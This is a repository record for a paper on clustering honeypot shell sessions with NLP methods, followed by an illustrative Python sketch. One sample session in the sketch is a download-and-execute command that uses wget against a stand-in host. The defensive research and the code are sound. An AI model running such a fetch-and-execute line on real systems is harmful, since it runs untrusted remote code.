Towards NLP-based Processing of Honeypot Logs

Boffa, Matteo; Milan, Giulia; Vassio, Luca; Drago, Idilio; Mellia, Marco; Ben Houidi, Zied

doi:10.1109/EuroSPW55150.2022.00038

Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time-consuming and cumbersome. Here we evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We use a widely deployed SSH/Telnet honeypot to record more than 200,000 sessions, including 61,000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session into a metric space, comparing two common NLP tools: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain a few tens of clusters, which we analyze to explain the attackers' goals, such as obtaining system information, injecting malicious accounts, and downloading and running executables. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities.
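The pipeline summarized in the abstract (parse sessions, build a Bag of Words representation, cluster) can be illustrated with a minimal sketch. It is not the authors' implementation: the abstract does not name the parser or the clustering algorithm, so the `shlex`-based tokenizer, the cosine similarity, the greedy threshold clustering, the `0.5` threshold, and the three sample sessions are all assumptions chosen for illustration. Word2Vec is omitted to keep the example dependency-free.

```python
import math
import shlex
from collections import Counter


def tokenize(session: str) -> list[str]:
    """Split a shell session into tokens (commands, options, parameters).

    Assumption: ';', '|' and '&&' separate commands. Real Bash parsing
    is considerably more involved.
    """
    for sep in ("&&", ";", "|"):
        session = session.replace(sep, "\n")
    tokens: list[str] = []
    for line in session.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            tokens.extend(shlex.split(line))
        except ValueError:
            # Unbalanced quotes: fall back to whitespace splitting.
            tokens.extend(line.split())
    return tokens


def bag_of_words(session: str) -> Counter:
    """Represent a session as token counts."""
    return Counter(tokenize(session))


def cosine(a: Counter, b: Counter) -> float:
    """Cosine similarity between two sparse count vectors."""
    dot = sum(count * b[token] for token, count in a.items())
    norm_a = math.sqrt(sum(c * c for c in a.values()))
    norm_b = math.sqrt(sum(c * c for c in b.values()))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)


def greedy_cluster(vectors: list[Counter], threshold: float) -> list[int]:
    """Assign each vector to the first cluster whose representative
    (its first member) is at least `threshold` similar; otherwise
    open a new cluster. A stand-in for a real clustering algorithm.
    """
    representatives: list[Counter] = []
    labels: list[int] = []
    for vec in vectors:
        for idx, rep in enumerate(representatives):
            if cosine(vec, rep) >= threshold:
                labels.append(idx)
                break
        else:
            representatives.append(vec)
            labels.append(len(representatives) - 1)
    return labels


# Hypothetical sessions, invented for illustration only.
sessions = [
    "uname -a; cat /proc/cpuinfo",
    "uname -a; cat /proc/meminfo",
    "wget http://example.invalid/x.sh; chmod +x x.sh; ./x.sh",
]
vectors = [bag_of_words(s) for s in sessions]
labels = greedy_cluster(vectors, threshold=0.5)
print(labels)  # [0, 0, 1]
```

The two information-gathering sessions share three of their four tokens and fall into the same cluster, while the download-and-execute session shares none and opens a new one. With real honeypot logs, the vocabulary, similarity measure and clustering method would all need to be chosen and validated against the data.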

Towards NLP-based Processing of Honeypot Logs / Boffa, Matteo; Milan, Giulia; Vassio, Luca; Drago, Idilio; Mellia, Marco; Ben Houidi, Zied. - PRINT. - (2022), pp. 314-321. (2022 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), Genoa, Italy, 06-10 June 2022) [10.1109/EuroSPW55150.2022.00038].

Publication year: 2022
ISBN: 978-1-6654-9560-8
Publication type: 4.1 Contribution in conference proceedings

Files in this record:

File	Size	Format
Article_IEEE.pdf (restricted access; description: IEEE Xplore version; type: 2a. Post-print, publisher's version / Version of Record; license: non-public, private/restricted access)	774.13 kB	Adobe PDF
Workshop_WTMC.pdf (open access; description: Accepted Manuscript; type: 2. Post-print / Author's Accepted Manuscript; license: public, all rights reserved)	742.69 kB	Adobe PDF

Documents in IRIS are protected by copyright and all rights are reserved, unless otherwise indicated.

Use this identifier to cite or link to this document: https://hdl.handle.net/11583/2969416

PORTO @ Archivio Istituzionale della Ricerca